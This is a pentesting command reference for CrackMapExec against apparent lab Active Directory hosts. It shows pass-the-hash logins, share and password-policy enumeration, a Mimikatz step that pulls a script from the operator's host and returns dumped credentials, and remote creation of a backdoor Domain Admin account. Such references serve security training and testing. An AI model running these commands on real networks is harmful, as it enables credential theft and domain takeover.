CrackMapExec

Last updated 10 months ago

CrackMapExec

CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve it's functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.

As CME is already pretty well documented and explained by byt3bl33d3r himself, this article will serve the purpose of command reference.

> crackmapexec smb 10.10.10.52 -u demonas -p 'M374L_P@ssW0rd!'
SMB 10.10.10.52 445 EMPEROR [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:EMPEROR) (domain:KVLT) (signing:True) (SMBv1:True)
SMB 10.10.10.52 445 EMPEROR [+] KVLT\demonas:M374L_P@ssW0rd!
> crackmapexec smb 10.10.10.1/24 -u demonas -p 'M374L_P@ssW0rd!' --pass-pol
SMB 10.10.10.52 445 EMPEROR [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:EMPEROR) (domain:KVLT) (signing:True) (SMBv1:True)
SMB 10.10.10.40 445 FREEZING-MOON [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:FREEZING-MOON) (domain:FREEZING-MOON) (signing:False) (SMBv1:True)
SMB 10.10.10.59 445 MAYHEM [*] Windows Server 2016 Standard 14393 x64 (name:MAYHEM) (domain:MAYHEM) (signing:False) (SMBv1:True)
SMB 10.10.10.52 445 EMPEROR [+] KVLT\demonas:M374L_P@ssW0rd!
SMB 10.10.10.40 445 FREEZING-MOON [+] FREEZING-MOON\demonas:M374L_P@ssW0rd!
SMB 10.10.10.59 445 MAYHEM [-] MAYHEM\demonas:M374L_P@ssW0rd! STATUS_LOGON_FAILURE
SMB 10.10.10.52 445 EMPEROR [+] Dumping password info for domain: KVLT
SMB 10.10.10.52 445 EMPEROR Minimum password length: 7
SMB 10.10.10.52 445 EMPEROR Password history length: 24
SMB 10.10.10.52 445 EMPEROR Maximum password age:
SMB 10.10.10.52 445 EMPEROR
SMB 10.10.10.52 445 EMPEROR Password Complexity Flags: 000001
SMB 10.10.10.52 445 EMPEROR Domain Refuse Password Change: 0
SMB 10.10.10.52 445 EMPEROR Domain Password Store Cleartext: 0
SMB 10.10.10.52 445 EMPEROR Domain Password Lockout Admins: 0
SMB 10.10.10.52 445 EMPEROR Domain Password No Clear Change: 0
SMB 10.10.10.52 445 EMPEROR Domain Password No Anon Change: 0
SMB 10.10.10.52 445 EMPEROR Domain Password Complex: 1
SMB 10.10.10.52 445 EMPEROR
SMB 10.10.10.52 445 EMPEROR Minimum password age:
SMB 10.10.10.52 445 EMPEROR Reset Account Lockout Counter: 30 minutes
SMB 10.10.10.52 445 EMPEROR Locked Account Duration: 30 minutes
SMB 10.10.10.52 445 EMPEROR Account Lockout Threshold: None
SMB 10.10.10.52 445 EMPEROR Forced Log off Time: Not Set
SMB 10.10.10.3 445 FUNERAL-FOG [*] Unix (name:FUNERAL-FOG) (domain:FUNERAL-FOG) (signing:False) (SMBv1:True)
SMB 10.10.10.3 445 FUNERAL-FOG [-] FUNERAL-FOG\demonas:M374L_P@ssW0rd! STATUS_LOGON_FAILURE
> crackmapexec smb 10.10.10.59 -u Sathanas -p 'DeMysteriisDomSathanas!' --shares
SMB 10.10.10.59 445 MAYHEM [*] Windows Server 2016 Standard 14393 x64 (name:MAYHEM) (domain:MAYHEM) (signing:False) (SMBv1:True)
SMB 10.10.10.59 445 MAYHEM [+] MAYHEM\Sathanas:DeMysteriisDomSathanas!
SMB 10.10.10.59 445 MAYHEM [+] Enumerated shares
SMB 10.10.10.59 445 MAYHEM Share Permissions Remark
SMB 10.10.10.59 445 MAYHEM ----- ----------- ------
SMB 10.10.10.59 445 MAYHEM ACCT READ
SMB 10.10.10.59 445 MAYHEM ADMIN$ Remote Admin
SMB 10.10.10.59 445 MAYHEM C$ Default share
SMB 10.10.10.59 445 MAYHEM IPC$ Remote IPC

Pass the Hash

kali :: ~ # cme smb 10.8.14.14 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:e8bcd502fbbdcd9379305dca15f4854e --local-auth 2 ↵
SMB 10.8.14.14 445 SQL01 [*] Windows Server 2012 R2 Standard Evaluation 9600 x64 (name:SQL01) (domain:SQL01) (signing:False) (SMBv1:True)
SMB 10.8.14.14 445 SQL01 [+] SQL01\Administrator aad3b435b51404eeaad3b435b51404ee:e8bcd502fbbdcd9379305dca15f4854e (Pwn3d!)

CME with user hash against our subnet:

kali :: ~ # cme smb 10.8.14.0/24 -u maniac -H e045c10921635ee21d6bd3b3f64a416f
SMB 10.8.14.12 445 MX01 [*] Windows Server 2012 R2 Standard Evaluation 9600 x64 (name:MX01) (domain:LAB) (signing:True) (SMBv1:True)
SMB 10.8.14.15 445 WEB01 [*] Windows Server 2012 R2 Standard Evaluation 9600 x64 (name:WEB01) (domain:LAB) (signing:False) (SMBv1:True)
SMB 10.8.14.10 445 DC01 [*] Windows Server 2012 R2 Standard Evaluation 9600 x64 (name:DC01) (domain:LAB) (signing:True) (SMBv1:True)
SMB 10.8.14.11 445 FS01 [*] Windows Server 2012 R2 Standard Evaluation 9600 x64 (name:FS01) (domain:LAB) (signing:False) (SMBv1:True)
SMB 10.8.14.14 445 SQL01 [*] Windows Server 2012 R2 Standard Evaluation 9600 x64 (name:SQL01) (domain:LAB) (signing:False) (SMBv1:True)
SMB 10.8.14.17 445 RDS02 [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:RDS02) (domain:LAB) (signing:False) (SMBv1:True)
SMB 10.8.14.12 445 MX01 [+] LAB\maniac e045c10921635ee21d6bd3b3f64a416f (Pwn3d!)
SMB 10.8.14.15 445 WEB01 [+] LAB\maniac e045c10921635ee21d6bd3b3f64a416f
SMB 10.8.14.10 445 DC01 [+] LAB\maniac e045c10921635ee21d6bd3b3f64a416f
SMB 10.8.14.11 445 FS01 [+] LAB\maniac e045c10921635ee21d6bd3b3f64a416f
SMB 10.8.14.14 445 SQL01 [+] LAB\maniac e045c10921635ee21d6bd3b3f64a416f
SMB 10.8.14.17 445 RDS02 [+] LAB\maniac e045c10921635ee21d6bd3b3f64a416f

Shares Recon

kali :: ~ # cme smb 10.8.14.14 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:e8bcd502fbbdcd9379305dca15f4854e --local-auth --shares
SMB 10.8.14.14 445 SQL01 [*] Windows Server 2012 R2 Standard Evaluation 9600 x64 (name:SQL01) (domain:SQL01) (signing:False) (SMBv1:True)
SMB 10.8.14.14 445 SQL01 [+] SQL01\Administrator aad3b435b51404eeaad3b435b51404ee:e8bcd502fbbdcd9379305dca15f4854e (Pwn3d!)
SMB 10.8.14.14 445 SQL01 [+] Enumerated shares
SMB 10.8.14.14 445 SQL01 Share Permissions Remark
SMB 10.8.14.14 445 SQL01 ----- ----------- ------
SMB 10.8.14.14 445 SQL01 ADMIN$ READ,WRITE Remote Admin
SMB 10.8.14.14 445 SQL01 C$ READ,WRITE Default share
SMB 10.8.14.14 445 SQL01 IPC$ Remote IPC

Mimikatz

kali :: ~ # cme smb 10.8.14.14 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:e8bcd502fbbdcd9379305dca15f4854e --local-auth -M mimikatz
SMB 10.8.14.14 445 SQL01 [*] Windows Server 2012 R2 Standard Evaluation 9600 x64 (name:SQL01) (domain:SQL01) (signing:False) (SMBv1:True)
SMB 10.8.14.14 445 SQL01 [+] SQL01\Administrator aad3b435b51404eeaad3b435b51404ee:e8bcd502fbbdcd9379305dca15f4854e (Pwn3d!)
MIMIKATZ 10.8.14.14 445 SQL01 [+] Executed launcher
MIMIKATZ [*] Waiting on 1 host(s)
MIMIKATZ 10.8.14.14 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
MIMIKATZ [*] Waiting on 1 host(s)
MIMIKATZ [*] Waiting on 1 host(s)
MIMIKATZ [*] Waiting on 1 host(s)
MIMIKATZ [*] Waiting on 1 host(s)
MIMIKATZ 10.8.14.14 [*] - - "POST / HTTP/1.1" 200 -
MIMIKATZ 10.8.14.14 lab\maniac:e045c10921635ee21d6bd3b3f64a416f
MIMIKATZ 10.8.14.14 LAB\maniac:e045c10921635ee21d6bd3b3f64a416f
MIMIKATZ 10.8.14.14 LAB\SQL01$:5ad23d25ce4e58d242be7e4acb73fc4d
MIMIKATZ 10.8.14.14 [+] Added 3 credential(s) to the database
MIMIKATZ 10.8.14.14 [*] Saved raw Mimikatz output to Mimikatz-10.8.14.14-2018-03-22_122819.log

Executing commands as Domain Admin to DC (creating a new user and adding him to Domain Admins group):

kali :: ~ # cme smb 10.8.14.10 -u dead -H 49a074a39dd0651f647e765c2cc794c7 -X "net user hackerman LolWTF!#&$ /add /domain"
SMB 10.8.14.10 445 DC01 [*] Windows Server 2012 R2 Standard Evaluation 9600 x64 (name:DC01) (domain:LAB) (signing:True) (SMBv1:True)
SMB 10.8.14.10 445 DC01 [+] LAB\dead 49a074a39dd0651f647e765c2cc794c7 (Pwn3d!)
SMB 10.8.14.10 445 DC01 [+] Executed command
kali :: ~ # cme smb 10.8.14.10 -u dead -H 49a074a39dd0651f647e765c2cc794c7 -X 'net group "Domain Admins" /add hackerman /domain' 2 ↵
SMB 10.8.14.10 445 DC01 [*] Windows Server 2012 R2 Standard Evaluation 9600 x64 (name:DC01) (domain:LAB) (signing:True) (SMBv1:True)
SMB 10.8.14.10 445 DC01 [+] LAB\dead 49a074a39dd0651f647e765c2cc794c7 (Pwn3d!)
SMB 10.8.14.10 445 DC01 [+] Executed command